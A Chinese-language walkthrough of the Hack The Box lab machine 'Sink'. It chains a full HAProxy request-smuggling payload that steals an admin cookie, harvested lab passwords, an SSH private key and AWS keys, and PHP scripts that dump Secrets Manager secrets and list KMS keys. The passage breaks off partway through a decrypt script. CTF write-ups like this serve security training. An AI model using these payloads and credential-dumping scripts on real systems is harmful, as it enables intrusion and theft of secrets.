Hack-The-Box-walkthrough[sink]

introduce

OS: Linux
Difficulty: Insane
Points: 50
Release: 30 Jan 2021
IP: 10.10.10.225

• 

• 

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.225
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp  open     ppp?
3971/tcp  filtered lanrevserver
5000/tcp  open     http           Gunicorn 20.0.0
5502/tcp  filtered fcp-srvr-inst1
15587/tcp filtered unknown
33076/tcp filtered unknown
33578/tcp filtered unknown
34042/tcp filtered unknown
35365/tcp filtered unknown
35514/tcp filtered unknown
37653/tcp filtered unknown
49460/tcp filtered unknown
52393/tcp filtered unknown
61352/tcp filtered unknown
62934/tcp filtered unknown
64002/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=2/8%Time=6020CC14%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\
SF:x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=592127b437b6a2ef;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=PccXCCJkvDgYnPWvzV9xVDHs
SF:7ac6MTYxMjc2MjI5NDgwMDY5NzAyMA;\x20Path=/;\x20Expires=Tue,\x2009\x20Feb
SF:\x202021\x2005:31:34\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORI
SF:GIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:34\x20GMT\r\n\r\n<!D
SF:OCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\x2
SF:0data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"vi
SF:ewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<met
SF:a\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>\
SF:x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link\
SF:x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"use-cr
SF:edentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\">\n
SF:\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\
SF:x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20content
SF:=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pain
SF:less")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,1541,"HTTP/1\.0\x20404\x20Not\x20Found\r\n
SF:Content-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-
SF:US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=9fc
SF:180b318dbde9c;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=5Ky4gK3kv
SF:oCly7f1byXVrrmaJuM6MTYxMjc2MjMwMTk2Njg0MjIyMA;\x20Path=/;\x20Expires=Tu
SF:e,\x2009\x20Feb\x202021\x2005:31:41\x20GMT;\x20HttpOnly\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:41\x2
SF:0GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"them
SF:e-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge
SF:\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x2
SF:0a\x20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href
SF:=\"/manifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20na
SF:me=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\
SF:x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>
SF:\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x
SF:20a\x20c");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 3000

3000是gitea

port 5000

5000是devops

devops

5000端口随意注册登录，查看请求响应发现haproxy和gunicorn：

HTTP/1.1 200 OK

Server: gunicorn/20.0.0

Date: Mon, 08 Feb 2021 05:45:01 GMT

Connection: close

Content-Type: text/html; charset=utf-8

Content-Length: 6392

Vary: Cookie

Via: haproxy

X-Served-By: a3bb59be4ff6

这个搭配搜索资料发现请求走私漏洞：

• HAProxy HTTP request smuggling (CVE-2019-18277)

请求走私

随意注册登录进去后提交评论，进行请求走私，然后会触发管理员的request，之后去home查看，管理员的request header会作为评论显示在那里：

• payload request

POST /comment HTTP/1.1

Host: 10.10.10.225:5000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 358

Origin: http://10.10.10.225:5000

Connection: keep-alive

Referer: http://10.10.10.225:5000/home

Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE

Upgrade-Insecure-Requests: 1

Transfer-Encoding: chunked



5

msg=a

0



POST /comment HTTP/1.1

Host: localhost:5000

Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE

Content-Length: 300

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded



msg=

• 

• 

得到管理员的请求包，里面包含有管理员的cookie

GET /notes/delete/1234 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate Accept: */*
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU
X-Forwarded-For: 127.0.0.1

管理员cookie

Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU

admin

替换cookie，现在就是管理员了

notes

admin三个notes就是三个不同系统的账号密码：

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

gitea

使用code那个用户名密码可以登录3000的gitea：

root : FaH@3L>Z3})zzfQ3

Key_Management

在Key_Management的commits里可以找到marcus用户的私钥：

http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e

• id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

user flag

然后直接用这个私钥ssh登录marcus用户，得到user.txt:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# ssh -i id_rsa marcus@10.10.10.225
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 08 Feb 2021 10:18:34 AM UTC

  System load:                      0.2
  Usage of /:                       40.5% of 17.59GB
  Memory usage:                     63%
  Swap usage:                       1%
  Processes:                        305
  Users logged in:                  0
  IPv4 address for br-85739d6e29c0: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.225
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:8eea


79 updates can be installed immediately.
26 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Feb  7 17:56:51 2021 from 10.10.14.12
marcus@sink:~$ id
uid=1001(marcus) gid=1001(marcus) groups=1001(marcus)
marcus@sink:~$ whoami
marcus
marcus@sink:~$ ls
user.txt
marcus@sink:~$ cat user.txt
f9e781e7a74603e7e49c3749fe6182e0

• 

AWS

根据Key_Management相关代码，主要就是aws操作，可以直接在已有代码的基础上进行操作, 下载代码，根据代码信息需要把4566端口转发出来,key和secret可以在Log_Management中找到：

http://10.10.10.225:3000/root/Log_Management/commit/e8d68917f2570f3695030d0ded25dc95738fb1ba

'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'

ssh -N -L 4566:127.0.0.1:4566 -i id_rsa marcus@10.10.10.225

list secrets

• list_secrets.php

<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
	'region' => 'eu',
	'endpoint' => 'http://127.0.0.1:4566',
	'credentials' => [
		'key' => 'AKIAIUEN3QWCPSTEITJQ',
		'secret' => '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'
	],
	'version' => 'latest'
]);
try {
$result = $client->listSecrets(array(
));
var_dump($result);
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>

运行php脚本

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php list_secrets.php 
object(Aws\Result)#128 (2) {
  ["data":"Aws\Result":private]=>
  array(2) {
    ["SecretList"]=>
    array(3) {
      [0]=>
      array(9) {
        ["ARN"]=>
        string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
        ["Name"]=>
        string(13) "Jenkins Login"
        ["Description"]=>
        string(39) "Master Server to manage release cycle 1"
        ["KmsKeyId"]=>
        string(0) ""
        ["RotationEnabled"]=>
        bool(false)
        ["RotationLambdaARN"]=>
        string(0) ""
        ["RotationRules"]=>
        array(1) {
          ["AutomaticallyAfterDays"]=>
          int(0)
        }
        ["Tags"]=>
        array(0) {
        }
        ["SecretVersionsToStages"]=>
        array(1) {
          ["f5bfe052-d05c-46ec-a317-e563c9be2760"]=>
          array(1) {
            [0]=>
            string(10) "AWSCURRENT"
          }
        }
      }
      [1]=>
      array(9) {
        ["ARN"]=>
        string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
        ["Name"]=>
        string(10) "Sink Panel"
        ["Description"]=>
        string(46) "A panel to manage the resources in the devnode"
        ["KmsKeyId"]=>
        string(0) ""
        ["RotationEnabled"]=>
        bool(false)
        ["RotationLambdaARN"]=>
        string(0) ""
        ["RotationRules"]=>
        array(1) {
          ["AutomaticallyAfterDays"]=>
          int(0)
        }
        ["Tags"]=>
        array(0) {
        }
        ["SecretVersionsToStages"]=>
        array(1) {
          ["32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"]=>
          array(1) {
            [0]=>
            string(10) "AWSCURRENT"
          }
        }
      }
      [2]=>
      array(9) {
        ["ARN"]=>
        string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
        ["Name"]=>
        string(12) "Jira Support"
        ["Description"]=>
        string(22) "Manage customer issues"
        ["KmsKeyId"]=>
        string(0) ""
        ["RotationEnabled"]=>
        bool(false)
        ["RotationLambdaARN"]=>
        string(0) ""
        ["RotationRules"]=>
        array(1) {
          ["AutomaticallyAfterDays"]=>
          int(0)
        }
        ["Tags"]=>
        array(0) {
        }
        ["SecretVersionsToStages"]=>
        array(1) {
          ["8dfff6f9-3250-4577-9f57-f5e945c828ba"]=>
          array(1) {
            [0]=>
            string(10) "AWSCURRENT"
          }
        }
      }
    }
    ["@metadata"]=>
    array(4) {
      ["statusCode"]=>
      int(200)
      ["effectiveUri"]=>
      string(21) "http://127.0.0.1:4566"
      ["headers"]=>
      array(9) {
        ["content-type"]=>
        string(24) "text/html; charset=utf-8"
        ["content-length"]=>
        string(4) "1679"
        ["access-control-allow-origin"]=>
        string(1) "*"
        ["access-control-allow-methods"]=>
        string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
        ["access-control-allow-headers"]=>
        string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
        ["access-control-expose-headers"]=>
        string(16) "x-amz-version-id"
        ["connection"]=>
        string(5) "close"
        ["date"]=>
        string(29) "Mon, 08 Feb 2021 10:49:11 GMT"
        ["server"]=>
        string(13) "hypercorn-h11"
      }
      ["transferStats"]=>
      array(1) {
        ["http"]=>
        array(1) {
          [0]=>
          array(0) {
          }
        }
      }
    }
  }
  ["monitoringEvents":"Aws\Result":private]=>
  array(0) {
  }
}

get secret values

• get_secret_values.php

<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);

$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"];

try {
for ($i=0; $i<count($secretIDs); $i++) {
    $result = $client->getSecretValue(array(
        'SecretId' => $secretIDs[$i],
    ));
    var_dump($result);
}
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

运行php脚本

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php get_secret_values.php 
object(Aws\Result)#101 (2) {
  ["data":"Aws\Result":private]=>
  array(7) {
    ["ARN"]=>
    string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
    ["Name"]=>
    string(13) "Jenkins Login"
    ["VersionId"]=>
    string(36) "f5bfe052-d05c-46ec-a317-e563c9be2760"
    ["SecretString"]=>
    string(57) "{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}"
    ["VersionStages"]=>
    array(1) {
      [0]=>
      string(10) "AWSCURRENT"
    }
    ["CreatedDate"]=>
    object(Aws\Api\DateTimeResult)#97 (3) {
      ["date"]=>
      string(26) "2021-02-06 20:18:57.000000"
      ["timezone_type"]=>
      int(1)
      ["timezone"]=>
      string(6) "+00:00"
    }
    ["@metadata"]=>
    array(4) {
      ["statusCode"]=>
      int(200)
      ["effectiveUri"]=>
      string(21) "http://127.0.0.1:4566"
      ["headers"]=>
      array(9) {
        ["content-type"]=>
        string(24) "text/html; charset=utf-8"
        ["content-length"]=>
        string(3) "305"
        ["access-control-allow-origin"]=>
        string(1) "*"
        ["access-control-allow-methods"]=>
        string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
        ["access-control-allow-headers"]=>
        string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
        ["access-control-expose-headers"]=>
        string(16) "x-amz-version-id"
        ["connection"]=>
        string(5) "close"
        ["date"]=>
        string(29) "Mon, 08 Feb 2021 10:54:12 GMT"
        ["server"]=>
        string(13) "hypercorn-h11"
      }
      ["transferStats"]=>
      array(1) {
        ["http"]=>
        array(1) {
          [0]=>
          array(0) {
          }
        }
      }
    }
  }
  ["monitoringEvents":"Aws\Result":private]=>
  array(0) {
  }
}
object(Aws\Result)#126 (2) {
  ["data":"Aws\Result":private]=>
  array(7) {
    ["ARN"]=>
    string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
    ["Name"]=>
    string(10) "Sink Panel"
    ["VersionId"]=>
    string(36) "32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"
    ["SecretString"]=>
    string(55) "{"username":"albert@sink.htb","password":"Welcome123!"}"
    ["VersionStages"]=>
    array(1) {
      [0]=>
      string(10) "AWSCURRENT"
    }
    ["CreatedDate"]=>
    object(Aws\Api\DateTimeResult)#131 (3) {
      ["date"]=>
      string(26) "2021-02-06 20:18:57.000000"
      ["timezone_type"]=>
      int(1)
      ["timezone"]=>
      string(6) "+00:00"
    }
    ["@metadata"]=>
    array(4) {
      ["statusCode"]=>
      int(200)
      ["effectiveUri"]=>
      string(21) "http://127.0.0.1:4566"
      ["headers"]=>
      array(9) {
        ["content-type"]=>
        string(24) "text/html; charset=utf-8"
        ["content-length"]=>
        string(3) "296"
        ["access-control-allow-origin"]=>
        string(1) "*"
        ["access-control-allow-methods"]=>
        string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
        ["access-control-allow-headers"]=>
        string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
        ["access-control-expose-headers"]=>
        string(16) "x-amz-version-id"
        ["connection"]=>
        string(5) "close"
        ["date"]=>
        string(29) "Mon, 08 Feb 2021 10:54:15 GMT"
        ["server"]=>
        string(13) "hypercorn-h11"
      }
      ["transferStats"]=>
      array(1) {
        ["http"]=>
        array(1) {
          [0]=>
          array(0) {
          }
        }
      }
    }
  }
  ["monitoringEvents":"Aws\Result":private]=>
  array(0) {
  }
}
object(Aws\Result)#135 (2) {
  ["data":"Aws\Result":private]=>
  array(7) {
    ["ARN"]=>
    string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
    ["Name"]=>
    string(12) "Jira Support"
    ["VersionId"]=>
    string(36) "8dfff6f9-3250-4577-9f57-f5e945c828ba"
    ["SecretString"]=>
    string(59) "{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}"
    ["VersionStages"]=>
    array(1) {
      [0]=>
      string(10) "AWSCURRENT"
    }
    ["CreatedDate"]=>
    object(Aws\Api\DateTimeResult)#140 (3) {
      ["date"]=>
      string(26) "2021-02-06 20:18:57.000000"
      ["timezone_type"]=>
      int(1)
      ["timezone"]=>
      string(6) "+00:00"
    }
    ["@metadata"]=>
    array(4) {
      ["statusCode"]=>
      int(200)
      ["effectiveUri"]=>
      string(21) "http://127.0.0.1:4566"
      ["headers"]=>
      array(9) {
        ["content-type"]=>
        string(24) "text/html; charset=utf-8"
        ["content-length"]=>
        string(3) "304"
        ["access-control-allow-origin"]=>
        string(1) "*"
        ["access-control-allow-methods"]=>
        string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
        ["access-control-allow-headers"]=>
        string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
        ["access-control-expose-headers"]=>
        string(16) "x-amz-version-id"
        ["connection"]=>
        string(5) "close"
        ["date"]=>
        string(29) "Mon, 08 Feb 2021 10:54:16 GMT"
        ["server"]=>
        string(13) "hypercorn-h11"
      }
      ["transferStats"]=>
      array(1) {
        ["http"]=>
        array(1) {
          [0]=>
          array(0) {
          }
        }
      }
    }
  }
  ["monitoringEvents":"Aws\Result":private]=>
  array(0) {
  }
}

整理出账号密码

{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}
{"username":"albert@sink.htb","password":"Welcome123!"}
{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}

david

通过aws相关操作得到david密码，切换到david：

marcus@sink:~$ su david
Password: 
david@sink:/home/marcus$ id
uid=1000(david) gid=1000(david) groups=1000(david)
david@sink:/home/marcus$ whoami
david

servers.enc

发现一个加密的servers.enc文件，解密还是需要通过aws操作：

david@sink:~$ cd Projects/
david@sink:~/Projects$ ls
Prod_Deployment
david@sink:~/Projects$ cd Prod_Deployment/
david@sink:~/Projects/Prod_Deployment$ ls
servers.enc
david@sink:~/Projects/Prod_Deployment$ cat servers.enc 
�$j�p����8=R]=�µ+�,�gS��I=�7�▒�S�.ɒ`�46Z]���F�C����t(�{���?]!��Ci�5�V'�E����?�r�{3�r�\�)�{�#��(j�,.�$�X#D�r��_8\�Z»q<�o���*��<����'â0R/Z��<y�B�#
                Y|�4�9�U�ݠ~��\M��"a�q�▒a
����Ļ;U���/2��둲Q�HL"S�{��
쯮��CCx�8룘u�Y����z��j?�y�����z� ���1w9�EV��\�T
                                               F)c@�9s▒/�����?ġ����g�����Z���1��8;��o�:��'�����l剺��O���A!}�v�,��9H#Q�w�▒1������5Vt��6���d���5�&�$���hKY!$MPI�$z��MU��/?7�L��M*�ſ▒�david@sink:~/Projects/Prod_Deployment$

listkeys

项目里自带listkeys，直接运行报错，需要把里面的version改成latest,还有认证信息参考前面的脚本改:

• listkeys1.php

<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'version' => 'latest',
    'region' => 'eu',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint' => 'http://127.0.0.1:4566'
]);

$limit = 100;

try {
    $result = $KmsClient->listKeys([
        'Limit' => $limit,
    ]);
    var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

运行php脚本

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php listkeys1.php | grep "string(36)" | cut -d " " -f 10
"0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
"16754494-4333-4f77-ad4c-d0b73d799939"
"2378914f-ea22-47af-8b0c-8252ef09cd5f"
"2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
"53bb45ef-bf96-47b2-a423-74d9b89a297a"
"804125db-bdf1-465a-a058-07fc87c0fad0"
"837a2f6e-e64c-45bc-a7aa-efa56a550401"
"881df7e3-fb6f-4c7b-9195-7f210e79e525"
"c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
"f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
"f2358fef-e813-4c59-87c8-70e50f6d4f70"

decrypt

• decrypt.php

<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'version' => 'latest',
    'region' => 'eu',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint' => 'http://127.0.0.1:4566'
]);

$keys = ["0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
    "16754494-4333-4f77-ad4c-d0b73d799939",
    "2378914f-ea22-47af-8b0c-8252ef09cd5f",
    "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
    "53bb45ef-bf96-47b2-a423-74d9b89a297a",
    "804125db-bdf1-465a-a058-07fc87c0fad0",
    "837a2f6e-e64c-45bc-a7aa-efa56a550401",
    "881df7e3-fb6f-4c7b-9195-7f210e79e525",
    "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
    "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
    "f2358fef-e813-4c59-87c8-70e50f6d4f70"];
